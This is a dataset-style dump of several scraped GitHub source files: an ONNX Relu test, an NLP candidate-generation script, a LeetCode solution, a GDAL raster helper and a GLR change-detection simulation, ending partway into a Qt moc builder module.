seq_id string | text string | repo_name string | sub_path string | file_name string | file_ext string | file_size_in_byte int64 | program_lang string | lang string | doc_type string | stars int64 | dataset string | pt string | api list |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
33654948642 | import unittest
from onnx import defs, helper
from onnx.onnx_pb2 import NodeProto
class TestRelu(unittest.TestCase):
    """Smoke-test that the ONNX registry knows Relu and a Relu node builds."""

    def test_relu(self):
        # Relu must be registered in the operator schema registry.
        self.assertTrue(defs.has('Relu'))
        # Building a one-input/one-output Relu node must not raise.
        node_def = helper.make_node('Relu', ['X'], ['Y'])


if __name__ == '__main__':
    unittest.main()
| tianyaoZhang/myONNX | onnx/test/relu_test.py | relu_test.py | py | 307 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "unittest.TestCase",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "onnx.defs.has",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "onnx.defs",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "onnx.helper.make_node",... |
73527120745 | '''
candidate generation: writes a pickle file of candidates
'''
import sys
import nltk
import numpy as np
from ncbi_normalization import load, sample
from ncbi_normalization.parse_MEDIC_dictionary import concept_obj
from normalize import dump_data, load_data, load_mentions
from gensim.models import KeyedVectors
def prepare_embedding_vocab(filename, binary=True, limit=1000000):
    '''filename: '~/disease-normalization/data/embeddings/wvec_50_haodi-li-et-al.bin'
    1. Use gensim for reading in embedding model
    2. Sort based on the index to make sure that they are in the correct order
    3. Normalize the vectors
    4. Build vocabulary mappings, zero for padding
    5. Create an inverse dictionary
    '''
    vector_model = KeyedVectors.load_word2vec_format(filename, binary=binary, limit=limit)
    # Order tokens by their row index in the embedding matrix.
    ordered = sorted(vector_model.vocab.items(), key=lambda item: item[1].index)
    words = [token for token, _ in ordered]
    # L2-normalize the vectors in place.
    vector_model.init_sims(replace=True)
    vocabulary = {"<SPECIAL>": 0, "<OOV>": 1}  # 0 = padding, 1 = out-of-vocabulary
    for token in words:
        vocabulary.setdefault(token, len(vocabulary))
    inversed_vocabulary = {idx: token for token, idx in vocabulary.items()}
    return vector_model, vocabulary, inversed_vocabulary
def load_pretrained_word_embeddings(vocab, embedding_model):
    """vocab: vocabulary from data vectorizer
    embedding_model: model loaded with gensim"""
    dim = embedding_model.vectors.shape[1]
    # Rows start as small uniform noise; row 0 is kept all-zero for padding.
    pretrained_embeddings = np.random.uniform(low=-0.05, high=0.05,
                                              size=(len(vocab) - 1, dim))
    pretrained_embeddings = np.vstack((np.zeros(shape=(1, dim)), pretrained_embeddings))
    found = 0
    for word, idx in vocab.items():
        if word in embedding_model.vocab:
            # Overwrite the noise row with the real pretrained vector.
            pretrained_embeddings[idx] = embedding_model.get_vector(word)
            found += 1
    print("Found pretrained vectors for {found} words.".format(found=found))
    return pretrained_embeddings
def load_concepts(dict_file, order):
    '''
    dict_file: path to the tsv file of the MEDIC dictionary
    dictionary.loaded format:
    dictionary of entries, key = canonical id, value = named tuple in the form of
    MEDIC_ENTRY(DiseaseID='MESH:D005671', DiseaseName='Fused Teeth',
    AllDiseaseIDs=('MESH:D005671',), AllNames=('Fused Teeth', 'Teeth, Fused')
    '''
    # Load the MEDIC dictionary into a Terminology container.
    dictionary = load.Terminology()
    dictionary.loaded = load.load(dict_file, 'MEDIC')
    concept = concept_obj(dictionary, order=order)
    # Lower-case names so they match the lower-cased mention spans.
    concept.names = [name.lower() for name in concept.names]
    return concept, dictionary
def span_to_sum_of_w2v(spans, vocabulary, pretrained):
    '''
    represent all spans by sum of w2v
    '''
    representations = []
    for span in spans:
        tokens = nltk.word_tokenize(span.lower())
        # Unknown tokens fall back to index 1 (<OOV>).
        rows = [pretrained[vocabulary.get(token, 1)] for token in tokens]
        representations.append(np.sum(np.array(rows), axis=0))
    return np.array(representations)
def cosine_similarity_candidates(mention_spans, concept_spans, emb_path, n_cossim):
    '''
    yields list of list of candidates
    n_cossim = number of candidates for each mention
    '''
    # Embeddings and vocabulary.
    vector_model, vocabulary, inversed_vocabulary = prepare_embedding_vocab(emb_path, binary=True)
    pretrained = load_pretrained_word_embeddings(vocabulary, vector_model)
    # Sum-of-word-vector representations.
    mention_embeddings = span_to_sum_of_w2v(mention_spans, vocabulary, pretrained)
    concept_embeddings = span_to_sum_of_w2v(concept_spans, vocabulary, pretrained)
    from sklearn.preprocessing import normalize
    mention_embeddings = normalize(mention_embeddings)
    concept_embeddings = normalize(concept_embeddings)
    # Cosine similarity = dot product of L2-normalized vectors.
    similarity = np.dot(mention_embeddings, np.transpose(concept_embeddings))
    # Top n_cossim concept indices per mention (unsorted within the top set).
    candidate_indices = [
        np.argpartition(np.array(row), -n_cossim)[-n_cossim:].tolist()
        for row in similarity.tolist()
    ]
    return candidate_indices
def jaccard_distance_candidates(mention_spans, concept_spans, n_jaccard):
    # NOTE(review): argpartition with -n_jaccard keeps the n_jaccard *largest*
    # Jaccard distances, i.e. the least similar concepts; for nearest-neighbour
    # candidates the smallest distances would be expected -- confirm intent.
    candidate_indices = []
    for mention in mention_spans:
        mention_chars = set(mention)
        distances = np.array([nltk.jaccard_distance(mention_chars, set(concept))
                              for concept in concept_spans])
        candidate_indices.append(
            np.argpartition(distances, -n_jaccard)[-n_jaccard:].tolist())
    return candidate_indices
if __name__ == "__main__":
    '''
    1. prepare concept spans & mention spans
    2. get the candidates based on cosine similarity
    3. get the candidates based on Jaccard distance
    4. prepare (start, end, span), gold standard
    '''
    dict_file = 'data/CTD_diseases.tsv'
    dev_file = 'data/NCBIdevelopset_corpus.txt'
    emb_path = 'data/wvec_50_haodi-li-et-al.bin'
    # BUG FIX: sys.argv values are strings; np.argpartition needs integers.
    n_cossim = int(sys.argv[1])
    n_jaccard = int(sys.argv[2])
    save_to = 'data/selected_max200.pickle'
    # (1) concepts -- only the concept ordering is needed from the pickle
    [potato0, potato1, concept_order, potato2, potato3, potato4] = load_data('data/sampled_dev_set.pickle')
    del potato0, potato1, potato2, potato3, potato4
    concept, dictionary = load_concepts(dict_file, concept_order)
    # mentions
    corpus_dev = load_mentions(dev_file, 'dev corpus')
    # (2) candidates by cosine similarity
    cossim_candidate_indices = cosine_similarity_candidates(corpus_dev.names, concept.names, emb_path, n_cossim)
    # (3) candidates by Jaccard distance
    jaccard_candidate_indices = jaccard_distance_candidates(corpus_dev.names, concept.names, n_jaccard)
    # (4) merge the two candidate sets per mention
    assert len(cossim_candidate_indices) == len(jaccard_candidate_indices)
    candidates = []
    for cossim, jaccard in zip(cossim_candidate_indices, jaccard_candidate_indices):
        candidates.append(sorted(set(cossim + jaccard)))
    positives_training, positives_dev, positives_dev_truncated = load_data('data/gitig_positive_indices.pickle')
    del positives_training, positives_dev_truncated
    # BUG FIX: `vocabulary` was never defined in this scope (it was local to
    # cosine_similarity_candidates), causing a NameError; rebuild it here.
    _, vocabulary, _ = prepare_embedding_vocab(emb_path, binary=True)
    positives_dev = sample.prepare_positives(positives_dev, nltk.word_tokenize, vocabulary)
    can_val_data = sample.NewDataSet('dev corpus')
    can_val_data.y = []
    can_val_data.mentions = []
    start = 0
    for cans, poss, span in zip(candidates, positives_dev, corpus_dev.names):
        end = start + len(cans)
        (chosen_idx, idces), e_token_indices = poss
        # y: 1 when the candidate index is a gold-standard concept for the mention.
        can_val_data.y.extend([1 if can in idces else 0 for can in cans])
        can_val_data.mentions.append((start, end, span))
        start = end
    assert len(can_val_data.mentions) == len(candidates)
    data = [candidates, can_val_data.mentions, can_val_data.y]
    dump_data(save_to, data)
| fshdnc/nor-bert | src/candidate_generation.py | candidate_generation.py | py | 6,793 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "gensim.models.KeyedVectors.load_word2vec_format",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "gensim.models.KeyedVectors",
"line_number": 26,
"usage_type": "name"
},
{
"api_name": "numpy.random.uniform",
"line_number": 39,
"usage_type": "call"... |
18252621901 | from typing import List
class Solution:
    def minStartValue1(self, nums: List[int]) -> int:
        """Binary-search the smallest start value keeping every prefix sum >= 1.

        Values are bounded by |num| <= 100, so the answer is in [1, 100*n + 1].
        """
        lo, hi = 1, 100 * len(nums) + 1
        while lo < hi:
            mid = (lo + hi) // 2
            running = mid
            feasible = True
            for value in nums:
                running += value
                if running < 1:
                    feasible = False
                    break
            if feasible:
                hi = mid
            else:
                lo = mid + 1
        return lo

    def minStartValue2(self, nums: List[int]) -> int:
        """O(n): the answer is 1 minus the most negative prefix sum."""
        lowest = 0
        prefix = 0
        for value in nums:
            prefix += value
            lowest = min(lowest, prefix)
        return 1 - lowest
# Quick self-check: both implementations must agree on the sample input.
solution = Solution()
nums = [-3, 2, -3, 4, 2]
assert solution.minStartValue1(nums) == 5, "Should be 5"
assert solution.minStartValue2(nums) == 5, "Should be 5"
| hujienan/Jet-Algorithm | leetcode/1413. Minimum Value to Get Positive Step by Step Sum/index.py | index.py | py | 951 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "typing.List",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "typing.List",
"line_number": 25,
"usage_type": "name"
}
] |
72300794345 | import sys
from osgeo import gdal, osr
class GDALUtilities:
    """
    This class has the following capabilities
    1. Get raster info
    2. Read image band as an array
    3. Reproject a raster
    """

    def __init__(self, path):
        # path: filesystem path of the raster this helper operates on.
        self.path = path

    def get_raster_info(self):
        """Print driver, dimensions, projection, geotransform and band names."""
        self.dataset = gdal.Open(self.path, gdal.GA_ReadOnly)
        print(
            "Driver: {}/{}\n".format(
                self.dataset.GetDriver().ShortName, self.dataset.GetDriver().LongName
            )
        )
        print(
            "Size is {} x {} x {}\n".format(
                self.dataset.RasterXSize, self.dataset.RasterYSize, self.dataset.RasterCount
            )
        )
        print("Projection is {}\n".format(self.dataset.GetProjection()))
        geotransform = self.dataset.GetGeoTransform()
        if geotransform:
            print("Origin = ({}, {})\n".format(geotransform[0], geotransform[3]))
            print("Pixel Size = ({}, {})\n".format(geotransform[1], geotransform[5]))
        band_count = self.dataset.RasterCount
        # GDAL band indices are 1-based.
        for i in range(1, band_count + 1):
            band = self.dataset.GetRasterBand(i)
            band_name = band.GetDescription()
            if band_name:
                print(f"Band {i} Name: {band_name}")
            else:
                print(f"Band {i} has no name.")
        # BUG FIX: the original assigned the *local* name `dataset = None`,
        # leaving self.dataset (the actual GDAL handle) open; release it.
        self.dataset = None

    def read_image(self, band: int = None):
        """Return raster band `band` (1-based index) as a numpy array.

        NOTE(review): the default of None makes GetRasterBand fail when the
        argument is omitted -- callers must always pass a band number.
        """
        self.dataset = gdal.Open(self.path, gdal.GA_ReadOnly)
        raster_band = self.dataset.GetRasterBand(band)
        data = raster_band.ReadAsArray()
        self.dataset = None  # release the GDAL handle
        return data

    def reproject(
        self, output_path: str = None, target_crs: str = None  # EPSG:4326
    ):
        """Warp the raster to `target_crs` and write the result to `output_path`."""
        self.dataset = gdal.Open(self.path, gdal.GA_ReadOnly)
        input_dataset = self.dataset
        target_srs = osr.SpatialReference()
        target_srs.SetFromUserInput(target_crs)
        output_dataset = gdal.Warp(
            output_path, input_dataset, dstSRS=target_srs.ExportToWkt()
        )
        # Drop all references so GDAL flushes and closes both datasets
        # (BUG FIX: self.dataset previously kept the input open).
        input_dataset = None
        output_dataset = None
        self.dataset = None
{
"api_name": "osgeo.gdal.Open",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "osgeo.gdal",
"line_number": 19,
"usage_type": "name"
},
{
"api_name": "osgeo.gdal.GA_ReadOnly",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "osgeo.gdal.Ope... |
20761353624 | import math
import numpy as np
import statistics
import random
import time
import matplotlib.pyplot as plt
# Detection threshold for the GLR stopping rule.
h = 40
# Cap on retained samples (only used by the disabled windowing code below).
limit_number_of_taken_values = 200
# Default warm-up length before the change point (the Monte-Carlo routine
# below draws its own randomized warm-up length instead).
nb_of_initial_values = 100
nb_of_Dthet = 100
Dthets = [(i * 1 / nb_of_Dthet) for i in range(nb_of_Dthet)] # thet step for ARL function
# sigs = [(0.5 + i/nb_of_sensors) for i in range(nb_of_sensors)]
# sigs = [2 for i in range(nb_of_sensors)]
# Noise standard deviations, one per sensor.
sigs = [0.1, 0.5, 1.5]
nb_of_sensors = len(sigs)
def time_before_detection_step_signal(sigs, Dthet, nb_of_iteration, probas=[1] * len(sigs), h=h):
# Monte-Carlo estimate of the GLR detection delay for a step change: after a
# randomized warm-up of N(0, sig) samples, the mean jumps to Dthet and we count
# how many additional samples are taken before a normalized cumulative sum
# crosses the threshold h.  Each sample i comes from sensor i % len(sigs) and
# is kept with probability probas[i % len(sigs)].
# Returns (mean delay, stdev of delay, list of raw delays).
# NOTE(review): `probas=[1] * len(sigs)` is a mutable default evaluated against
# the *global* sigs at definition time -- pass probas explicitly when the
# sensor list differs in length.
n= len(sigs)
nb_of_values = []
for p in range(nb_of_iteration):
#random.shuffle(sigs)
X_bar = [] # somme y_i -mu_0 / sigma i
nb_of_initial_values =random.randint(200, 200 + n )
for i in range(nb_of_initial_values):
sig = sigs[i % n]
p = random.random()
if p<probas[i % n]:
x = np.random.normal(0, sig)
m = len(X_bar)
for j in range(m):
X_bar[j] = X_bar[j] + x / sig
X_bar.append(x)
# print(reception_error)
# time.sleep(1)
detected = False
i = nb_of_initial_values
while detected is False:
sig = sigs[i % n]
p = random.random()
if p < probas[i % n]:
x = np.random.normal(Dthet, sig)
"""m = len(X_bar)
if m >= limit_number_of_taken_values:
X_bar = X_bar[1:]
m -= 1"""
# NOTE(review): `m` still holds the length computed during the warm-up loop;
# the refresh above is commented out, so entries appended after the change
# point are never accumulated into -- confirm this is intentional.
for j in range(m):
X_bar[j] = X_bar[j] + x / sig
# print((reception_error[j] * (n-j))**2)
X_bar.append(x)
for j in range(m + 1):
if (abs(X_bar[j]) / math.sqrt(m - j + 1) > h):
detected = True
# print(X_bar)
# print(j)
i += 1
nb_of_values.append(i - nb_of_initial_values)
return statistics.mean(nb_of_values), statistics.stdev(nb_of_values), nb_of_values
def necessary_nb_of_value_GSC(sig, Dthet, h):
    """Theoretical sample count for the GSC test: (h * sig / Dthet) ** 2."""
    ratio = h * sig / Dthet
    return math.pow(ratio, 2)
def average_nb_of_necessary_values_before_detection(sig, Dthet, nb_of_iteration):
    """Monte-Carlo mean of how many N(0, sig) draws are needed until the
    running mean plus the margin h*sig/sqrt(i) drops below Dthet.

    Uses the module-level threshold `h`.
    """
    counts = []
    for _ in range(nb_of_iteration):
        samples = [np.random.normal(0, sig)]
        i = 1
        while statistics.mean(samples) + (h * sig / math.sqrt(i)) > Dthet:
            samples.append(np.random.normal(0, sig))
            i += 1
        counts.append(i)
    return statistics.mean(counts)
"""
def plot_theoritical_ARL():
nb_of_Dthet = 100
Dthets = [(0.5 + (i * 2.5 / nb_of_Dthet)) for i in range(1, nb_of_Dthet)]
mean = []
for Dthet in Dthets:
mean.append(necessary_nb_of_value_GSC(sig, Dthet))
stri = ''
for i in range(len(Dthets)):
stri += '(' + str(Dthets[i]) + ',' + str(mean[i]) + ')'
print(stri)
def plot_ARL():
sig = 1
std = []
mean = []
expected = []
h = 10
nb_of_iteration = 1000
Dthet = 0.8
pas = 0.1
Dthets = []
while Dthet < 2:
Dthets.append(Dthet)
a, b = time_before_detection_step_signal([sig], Dthet, int(nb_of_iteration), h)
mean.append(a)
std.append(2.567 * b / math.sqrt(nb_of_iteration))
expected.append(necessary_nb_of_value_GSC(sig, Dthet, h))
# print("ok")
Dthet += pas
pas *= 1.1
nb_of_iteration *= 0.9
stri = ''
stri += '(' + str(Dthets[-1]) + ',' + str((mean[-1] - expected[-1]) * 100 / mean[-1]) + ') +- (0,)'
print(stri)
stri = ''
for i in range(len(Dthets)):
stri += '(' + str(Dthets[i]) + ',' + str((mean[i] - expected[i]) * 100 / mean[i]) + ')'
print(stri)
stri = ''
for i in range(len(Dthets)):
stri += '(' + str(Dthets[i]) + ',' + str(mean[i]) + ')'
print(stri)
stri = ''
for i in range(len(Dthets)):
stri += '(' + str(Dthets[i]) + ',' + str(expected[i]) + ')'
print(stri)
def time_before_detection_linear_signal(sig, slope, nb_of_iteration, h=h):
nb_of_values = []
for p in range(nb_of_iteration):
X_bar = []
for i in range(nb_of_initial_values):
x = np.random.normal(0, sig)
n = len(X_bar)
for j in range(n):
X_bar[j] = X_bar[j] * (n - j) / (n - j + 1) + x / (n - j + 1)
X_bar.append(x)
i = 0
detected = False
while detected is False:
i += 1
x = np.random.normal(slope * i, sig)
n = len(X_bar)
if n >= limit_number_of_taken_values:
X_bar = X_bar[1:]
n -= 1
for j in range(n):
X_bar[j] = X_bar[j] * (n - j) / (n - j + 1) + x / (n - j + 1)
X_bar.append(x)
for j in range(n + 1):
if (abs(X_bar[j]) > h * sig / math.sqrt(n + 1 - j)):
detected = True
# print(X_bar)
# print(j)
nb_of_values.append(i)
nb_of_values.append(i)
return statistics.mean(nb_of_values), statistics.stdev(nb_of_values)
def plot_LGAARL():
std = []
mean = []
nb_of_iteration = 80000
Dthet = 0.0
pas = 0.0005
Dthets = []
while Dthet < 0.4:
Dthets.append(Dthet)
a, b = time_before_detection_linear_signal(1, Dthet, int(nb_of_iteration))
mean.append(a)
std.append(2.567 * b / math.sqrt(nb_of_iteration))
# print("ok")
Dthet += pas
pas *= 1.1
nb_of_iteration *= 0.9
stri = '(' + str(Dthets[-1]) + ',' + str(mean[-1]) + ') +- (0,' + str(std[-1]) + ')'
print(stri)
stri = ''
for i in range(len(Dthets)):
stri += '(' + str(Dthets[i]) + ',' + str(mean[i]) + ') +- (0,' + str(std[i]) + ')'
print(stri)
"""
def main_1(Dthet):
# Compare transmission strategies for detecting a step of amplitude Dthet with
# three sensors of fixed noise levels: per-sensor runs are combined into
# "one by one" and "adapted one by one" estimates, a theoretical per-sensor
# optimum, and a simultaneous (round-robin) run.
# Returns (simul mean, simul 99% CI, one-by-one mean, one-by-one CI,
#          adapted mean, adapted CI, optimum).
means = []
stds = []
# Dthet = 1
nb_of_iteration = 10000
#h = 10
sigs = [1, 1.5, 2]
nb_of_sensors = len(sigs)
# Per-sensor detection delays.
for sig in sigs:
mean, std,z = time_before_detection_step_signal([sig], Dthet, int(nb_of_iteration / math.sqrt(len(sigs))))
means.append(mean)
stds.append(std / math.sqrt(nb_of_iteration / math.sqrt(len(sigs))))
# Weights proportional to 1/sig^2 for the adapted one-by-one strategy.
q = 0
for sig in sigs:
q += math.pow(1 / sig, 2)
mean_adapted_one_by_one = 0
std_adapted_one_by_one = 0
i = 0
for sig in sigs:
mean_adapted_one_by_one += math.pow(1 / (q * math.pow(sig, 2)), 2) * means[i]
std_adapted_one_by_one += stds[i] ** 2 * (1 / (q * math.pow(sig, 2))) ** 2
i += 1
mean_adapted_one_by_one *= len(sigs)
std_adapted_one_by_one = math.sqrt(std_adapted_one_by_one)
# Plain one-by-one strategy: uniform average of per-sensor delays.
std_one_by_one = 0
mean_one_by_one = 0
i = 0
for sig in sigs:
std_one_by_one += stds[i] ** 2
mean_one_by_one += means[i] / math.pow(len(sigs), 2)
i += 1
std_one_by_one = math.sqrt(std_one_by_one) / nb_of_sensors
mean_one_by_one *= len(sigs)
# Global optimum over one-by-one strategies, weighted by 1/mean.
q = 0
for m in means:
q += 1 / m
opti = 0
for m in means:
opti += math.pow(1 / (q * m), 2) * m
opti *= len(sigs)
# Simultaneous (round-robin) strategy over all sensors.
mean, std, z = time_before_detection_step_signal(sigs, Dthet, nb_of_iteration)
"""
print("one by one")
print(mean_one_by_one)
print(2.567 * std_one_by_one)
print("adapted one by one")
print(mean_adapted_one_by_one)
print(2.567 * std_adapted_one_by_one)
print("simultaneously")
print(mean)
print(2.567 * std / math.sqrt(nb_of_iteration))
"""
return mean, 2.567 * std / math.sqrt(
nb_of_iteration), mean_one_by_one, 2.567 * std_one_by_one, mean_adapted_one_by_one, 2.567 * std_adapted_one_by_one, opti
def main_2():
# Sweep the change amplitude and plot the mean detection delay of each
# strategy from main_1, with shaded 99% confidence bands.
Dthets = [1 + i * 2 / 10 for i in range(0, 10)]
mean_simul = []
std_simul = []
mean_one_one = []
std_one_one = []
mean_adapted = []
std_adapted = []
mean_opti = []
for Dthet in Dthets:
a, b, c, d, e, f, g = main_1(Dthet)
mean_simul.append(a)
std_simul.append(b)
mean_one_one.append(c)
std_one_one.append(d)
mean_adapted.append(e)
std_adapted.append(f)
mean_opti.append(g)
# Mean relative gap between the adapted strategy and the optimum (unused).
moyenne = 0
for i in range(len(Dthets)):
moyenne += abs((mean_adapted[i] - mean_opti[i]) / mean_opti[i])
plt.plot(Dthets, mean_simul, label='S0 round robin')
plt.plot(Dthets, mean_one_one, label='S1 un par un un')
plt.plot(Dthets, mean_adapted, label='S2 un par un période modifiée')
plt.plot(Dthets, mean_opti, label="S Opt optimum global pour les stratégies un par un")
# Confidence band for the simultaneous strategy.
lower_boundary = []
upper_boundary = []
for i in range(len(Dthets)):
lower_boundary.append(mean_simul[i] - std_simul[i])
upper_boundary.append(mean_simul[i] + std_simul[i])
plt.fill_between(Dthets, lower_boundary, upper_boundary, color='#D3D3D3')
# Confidence band for the one-by-one strategy.
lower_boundary = []
upper_boundary = []
for i in range(len(Dthets)):
lower_boundary.append(mean_one_one[i] - std_one_one[i])
upper_boundary.append(mean_one_one[i] + std_one_one[i])
plt.fill_between(Dthets, lower_boundary, upper_boundary, color='#D3D3D3')
# Confidence band for the adapted strategy.
lower_boundary = []
upper_boundary = []
for i in range(len(Dthets)):
lower_boundary.append(mean_adapted[i] - std_adapted[i])
upper_boundary.append(mean_adapted[i] + std_adapted[i])
plt.fill_between(Dthets, lower_boundary, upper_boundary, color='#D3D3D3', label='99% confiance intervalle')
plt.legend()
plt.xlabel("amplitude du changement à detecter")
plt.ylabel("temps moyen avant de lever une alerte de detection de changement")
plt.title("comparaisons de stratégies d'émission pour des problèmes de detection en utilisant la méthode GLR")
plt.show()
def main_3():
# Compare a fixed nested sensor schedule against randomly drawn schedules
# (sensor picked per slot with probabilities 0.04/0.16/0.80) and print the
# resulting mean detection delays.
Dthet = 1
sigs = [0.1, 0.5, 1.5]
nb_of_iteration = 1000
# First approach: fixed nested schedule interleaving the three sensors.
sigmas = [sigs[0],sigs[1]]
for i in range (5):
sigmas.append(sigs[2])
sigmas.append(sigs[1])
for i in range (5):
sigmas.append(sigs[2])
sigmas.append(sigs[1])
for i in range(5):
sigmas.append(sigs[2])
sigmas.append(sigs[1])
for i in range(5):
sigmas.append(sigs[2])
mean = time_before_detection_step_signal(sigmas, Dthet, nb_of_iteration, h=h)
print(mean)
# Second approach: random schedules with matching sensor frequencies.
sigs_lengths = 500
means = []
stds = []
for i in range(int(nb_of_iteration/100)):
sigmas = []
for j in range(sigs_lengths):
p = random.random()
if p < 0.04:
sigmas.append(sigs[0])
elif p < 0.2:
sigmas.append(sigs[1])
else:
sigmas.append(sigs[2])
mean = time_before_detection_step_signal(sigmas, Dthet, 100, h=h)
means.append(mean[0])
stds.append(mean[1])
print(statistics.mean(means))
print(statistics.mean(stds))
def comparison_of_different_scheduling(nb_of_first,nb_of_second,sigma_first, sigma_second, first_proba, second_proba, nb_of_cases):
# Draw nb_of_cases random orderings of a two-category sensor pool and print
# the empirical CDF of the mean detection delays, one "(delay,cumfrac)" pair
# per shuffled schedule.
infos = []
for i in range(nb_of_first):
infos.append([sigma_first,first_proba])
for i in range(nb_of_second):
infos.append([sigma_second, second_proba])
nb_of_iteration = 1000
h = 40
Dthet = 0.5
means = []
stds = []
for i in range(nb_of_cases):
# Shuffle the schedule, then split it into sigma and probability lists.
random.shuffle(infos)
sigmas = []
probas = []
for elt in infos:
sigmas.append(elt[0])
probas.append(elt[1])
mean, std, z = time_before_detection_step_signal(sigmas, Dthet, nb_of_iteration,probas, h)
means.append(mean)
stds.append(std/math.sqrt(nb_of_iteration))
means = sorted(means)
n = len(means)
to_print = ""
tot = 0
for elt in means:
tot += 1/n
to_print += "(" + str(elt) +"," + str(tot) + ') '
print(to_print)
def comparison_of_two_opposite_schedulings(nb_of_first,nb_of_second,sigma_first, sigma_second, first_proba, second_proba):
# Compare two deterministic schedules of the same sensor mix: all of the
# first category then all of the second, versus the reduced (gcd) interleaved
# pattern.  For each, print the mean delay and the empirical CDF of delays.
nb_of_iteration = 50000
h = 40
Dthet = 1
# Schedule 1: first all of the first category, then all of the second.
infos = []
for i in range(nb_of_first):
infos.append([sigma_first, first_proba])
for i in range(nb_of_second):
infos.append([sigma_second, second_proba])
sigmas = []
probas = []
for elt in infos:
sigmas.append(elt[0])
probas.append(elt[1])
mean, std, nb_of_value_before_detection = time_before_detection_step_signal(sigmas, Dthet, nb_of_iteration, probas, h)
print(mean)
# Build the empirical CDF: unique delay values with their multiplicities.
nb_of_value_before_detection = sorted(nb_of_value_before_detection)
values = []
nb_of_items = []
values.append(nb_of_value_before_detection.pop(0))
nb_of_items.append(1)
for elt in nb_of_value_before_detection:
if elt ==values[-1]:
nb_of_items[-1] += 1
else:
values.append(elt)
nb_of_items.append(1)
n = len(nb_of_value_before_detection)
to_print = ""
tot = 0
for elt in zip(values, nb_of_items):
tot += elt[1] / n
to_print += "(" + str(elt[0]) + "," + str(tot) + ') '
print(to_print)
# Schedule 2: shortest repeating pattern with the same category ratio.
pgcd = math.gcd(nb_of_first, nb_of_second)
infos = []
for i in range(int(nb_of_first/pgcd)):
infos.append([sigma_first,first_proba])
for i in range(int(nb_of_second/pgcd)):
infos.append([sigma_second, second_proba])
sigmas = []
probas = []
for elt in infos:
sigmas.append(elt[0])
probas.append(elt[1])
mean, std, nb_of_value_before_detection = time_before_detection_step_signal(sigmas, Dthet, nb_of_iteration, probas,
h)
print(mean)
# Same empirical-CDF computation for the second schedule.
nb_of_value_before_detection = sorted(nb_of_value_before_detection)
values = []
nb_of_items = []
values.append(nb_of_value_before_detection.pop(0))
nb_of_items.append(1)
for elt in nb_of_value_before_detection:
if elt == values[-1]:
nb_of_items[-1] += 1
else:
values.append(elt)
nb_of_items.append(1)
n = len(nb_of_value_before_detection)
to_print = ""
tot = 0
for elt in zip(values, nb_of_items):
tot += elt[1] / n
to_print += "(" + str(elt[0]) + "," + str(tot) + ') '
print(to_print)
def plot_CDF_of_one_random_solution(nb_of_first,nb_of_second,sigma_first, sigma_second, first_proba, second_proba):
# Run one randomly shuffled two-category schedule and print the empirical CDF
# of the detection delays as "(value,cumfrac)" pairs.
Dthet = 0.5
nb_of_iteration = 10000
h = 40
infos = []
for i in range(nb_of_first):
infos.append([sigma_first, first_proba])
for i in range(nb_of_second):
infos.append([sigma_second, second_proba])
# One random ordering of the pool.
random.shuffle(infos)
sigmas = []
probas = []
for elt in infos:
sigmas.append(elt[0])
probas.append(elt[1])
mean, std, nb_of_value_before_detection = time_before_detection_step_signal(sigmas, Dthet, nb_of_iteration, probas, h)
print(mean)
# Empirical CDF: unique delay values with their multiplicities.
nb_of_value_before_detection = sorted(nb_of_value_before_detection)
values = []
nb_of_items = []
values.append(nb_of_value_before_detection.pop(0))
nb_of_items.append(1)
for elt in nb_of_value_before_detection:
if elt == values[-1]:
nb_of_items[-1] += 1
else:
values.append(elt)
nb_of_items.append(1)
n = len(nb_of_value_before_detection)
to_print = ""
tot = 0
for elt in zip(values, nb_of_items):
tot += elt[1] / n
to_print += "(" + str(elt[0]) + "," + str(tot) + ') '
print(to_print)
def test():
    """Visual sanity check: sorted draws of N(0, 0.1)/0.1 and of N(0, 1)
    should trace the same curve."""
    scaled = [np.random.normal(0, 0.1) / 0.1 for _ in range(100000)]
    plt.plot(sorted(scaled))
    plt.show()
    standard = [np.random.normal(0, 1) for _ in range(100000)]
    plt.plot(sorted(standard))
    plt.show()
def function_of_the_performance_according_to_the_error_noise():
    """Plot the mean detection delay as a function of the sensor noise level."""
    Dthet = 1
    nb_of_iteration = 10000
    h = 40
    noise_levels = [i / 10 + 0.1 for i in range(20)]
    delays = []
    for sig in noise_levels:
        # NOTE(review): probas has len(noise_levels) entries but only index 0
        # is used for a single-sensor run.
        mean, std, values = time_before_detection_step_signal(
            [sig], Dthet, nb_of_iteration, probas=[1] * len(noise_levels), h=h)
        delays.append(mean)
    plt.plot(noise_levels, delays)
    plt.show()
if __name__ == "__main__":
# Entry point: only the noise-sweep experiment is currently active; the other
# experiments are kept below as disabled calls.
# quantify_false_positives(sigs)
# for sig in sigs:
# a, b = time_before_detection_step_signal(sig, 3, 10000, h=10)
# print("########")
# print(sig)
# print(a)
# plot_LGAARL()
#main_3()
"""nb_of_first = 50
nb_of_second = 50
sigma_first = 0.1
sigma_second = 0.1
first_proba = 1
second_proba = 1
nb_of_cases = 2
comparison_of_different_scheduling(nb_of_first, nb_of_second, sigma_first, sigma_second, first_proba, second_proba, nb_of_cases)
"""
function_of_the_performance_according_to_the_error_noise()
#comparison_of_two_opposite_schedulings(nb_of_first, nb_of_second, sigma_first, sigma_second, first_proba, second_proba)
#plot_CDF_of_one_random_solution(nb_of_first, nb_of_second, sigma_first, sigma_second, first_proba, second_proba)
| gwenmaudet/PhD_main | detection_step_signal/GLR.py | GLR.py | py | 17,337 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "random.randint",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "random.random",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "numpy.random.normal",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "numpy.random",
"... |
24390096374 | from itertools import chain
from . import builder
from .. import options as opts, safe_str, shell
from .common import Builder, choose_builder, SimpleBuildCommand
from ..file_types import HeaderFile, SourceFile
from ..iterutils import iterate
from ..languages import known_langs
from ..path import Path
from ..versioning import detect_version
# Set the source language to C++, since we want to be able to use the C++
# language definition to infer whether a file passed to `moc` is a source or
# header file based on its extension.
